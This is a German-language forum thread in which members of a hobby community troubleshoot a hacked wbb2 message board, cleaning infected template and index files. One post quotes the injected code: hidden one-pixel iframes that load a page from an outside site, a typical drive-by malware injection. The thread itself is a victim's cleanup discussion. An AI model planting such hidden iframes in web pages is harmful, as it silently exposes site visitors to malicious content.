Heute war ein cooler Tag in meiner MN, weil ...

  • Scheint aber nichts Großes zu sein, die einzelnen Bords und Threads scheinen noch da zu sein:


    http://www.sdr.mn-welt.de/forum/board.php?boardid=1


    Allerdings seid ihr wohl gehackt worden, wenn man sich den Quelltext der index.php ansieht:



    Zitat

    <!-- . --><iframe src="http://caprichosdecasa.net/images/index.php" width='1' height='1' frameborder='0'></iframe>
    <!-- . --> <!-- . --><iframe src="http://caprichosdecasa.net/images/index.php" width='1' height='1' frameborder='0'></iframe>
    <!-- . -->

  • Die spanische Möbelkette in unserer index.php hatte ich vorhin auch schon entdeckt. Der ACP funktioniert auch. Allerdings habe ich selber null Ahnung, was man in einer solchen Situation macht. Backup ist runtergeladen, aber ich habe Zweifel daran, dass es ein richtiges Backup ist, da es nur 12 MB groß ist.


    EDIT: Auch das ACP hat sich in die weiten Welten des ewigen Weiß verabschiedet.

  • 12 MB kann hinkommen...


    Hast du es mit MySQLDumper oder PHPmyAdmin erstellt?


    Würde das Forum einfach neu installieren und dann auf die hoffentlich noch funzende Datenbank verweisen lassen.

    "Ist es denn wirklich so, dass wir jeden Dreck, der vom Westen kommt, nu kopieren müssen? Ich denke, Genossen, mit der Monotonie des OIK-Bashings, und wie das alles heißt, ja, sollte man doch Schluss machen" Walter Albrecht

  • Nein, habe ich nicht. Ist jetzt auch gar nicht mehr so dramatisch. Es ging schneller als ich dachte: Die infizierten Dateien sind alle bearbeitet, alles iframe-Scheiß gelöscht. Theoretisch müsste ja jetzt wieder alles laufen, aber es ändert sich nichts. Obwohl das index.php auch bearbeitet ist, wird das gleiche angezeigt wie vor der Bearbeitung. Zum Mäusemelken ist das.

  • Die Index-Datei greift wohl auch auf irgendwelche Templates zu (d.h. beim wbb2 weiß ich es gar nicht so genau, wie das konstruiert ist), aber bei 206 Dateien, dürften die ja dabeigewesen sein.Vielleicht wirklich mal alles per FTP runterladen und die Dateien mit einem Suchwerkzeug nach dem besagten Code durchsuchen. Vielleicht hast Du irgendetwas übersehen.

  • Wenn ich etwas an das Ende der Index-Datei schreibe, zeigt der Quelltext nichts mehr an. Nehme ich das wieder weg, kommt wieder der Code mit der spanischen Möbelhandelsgesellschaft. Obwohl in der Datei selbst wirklich nichts mehr davon ist... Ich gucke mir das morgen mal in Ruhe noch einmal an.


    (204 der 206 Dateien, die ich bearbeitet habe, sind unter /forum/ACP/template. Die anderen zwei infizierten Dateien sind die index.php unter /forum und unter /forum/ACP. Eigentlich müsste alles beseitigt sein, aber anscheinend wurde irgendwas manipuliert.)


    EDIT:



    Ähm, das heißt, wahrscheinlicher ist wohl, daß die bei ihren Machenschaften irgendwas rausgelöscht haben. Nimm doch mal die Originalversion der index.php wie sie beim wbb2 dabei ist und ersetze die modifizierte.


    Dafür bräuchte ich die Originalversion aber erstmal. :wacko:

  • No way, alles was infiziert war wurde von mir geändert. Irgendwie mache ich irgendwas aber trotzdem irgendwo falsch, das Forum ist immer noch voller Links nach Bilbao. :cursing: Kann man die Typen nicht irgendwie anzeigen oder so, oder gleich erhängen.

  • Wäre es vielleicht denkbar, daß diese Links in die Datenbank geschrieben wurden und mit einer Verknüpfung ausgelesen werden? Ich vermute auch, wie gesagt, daß die in den betreffenden Seiten einiges gelöscht und nicht nur dazugeschrieben haben. Eine wirkliche Schweinerei das ganze.


    Ja, anzeigen müßte gehen, aber Du stehst dann schon mal vor dem Problem, ob Du es hier oder bei der Polizei in Spanien machst und dann fragt sich ob das tatsächlich Spanier sind. Ich vermute, es wird nicht viel bei rumkommen. Aufhängen wäre sicher praktikabler, aber eher nicht durch das Notwehrrecht gedeckt und haben müßte man sie ja auch erst mal. ;)


    Zitat

    Dafür bräuchte ich die Originalversion aber erstmal.


    Dann gehört das Forum wohl immer noch Bonecker.... Ich denke, Du wirst nicht umhinkommen, Dir die Originaldatei oder die zuletzt verwendete Variante zu besorgen. Da ja die Lizenz vorhanden ist könnte im Prinzip auch ein anderer wbb2-Besitzer eine solche zur Verfügung stellen.

  • No way, alles was infiziert war wurde von mir geändert. Irgendwie mache ich irgendwas aber trotzdem irgendwo falsch, das Forum ist immer noch voller Links nach Bilbao....


    Das scheint so nicht ganz richtig. Wenn ich das richtig sehe sind auf Eurem Webspace ALLE index.php und wahrscheinlich dazu noch alle .htm Dateien infiziert.

  • 203 Dateien unter /forum/acp/templates sind von mir gesäubert worden, dazu noch die beiden index.php unter /forum und /forum/acp. Die einzigen mir bekannten infizierten Dateien sind eben wieder die
    /acp/templates-Dateien, aber diesmal unter /altesforum. (Wie man schön hört: vom alten Forum, das anscheinend auch noch drauf war - wusste ich bis eben nicht.) Behindern jetzt die /altesforum-Dateien das Forum der SDR oder gibt es Dateien unter /forum, die ich noch sauber machen muss oder sind sie erst gar nicht sauber gemacht worden?!


    Ich werde mich mal nach dem Originalforum erkundigen. Schon irgendwie scheiße, wenn man keine Ahnung davon hat.


    (Wenn ich jetzt ein wbb 3 kaufe; könnte ich dann die Profile, Beiträge (alle Beiträge! Threads, ...), Unterforen usw. übernehmen? Beziehungsweise allgemein: die Beiträge usw. sind ja noch da, oder?)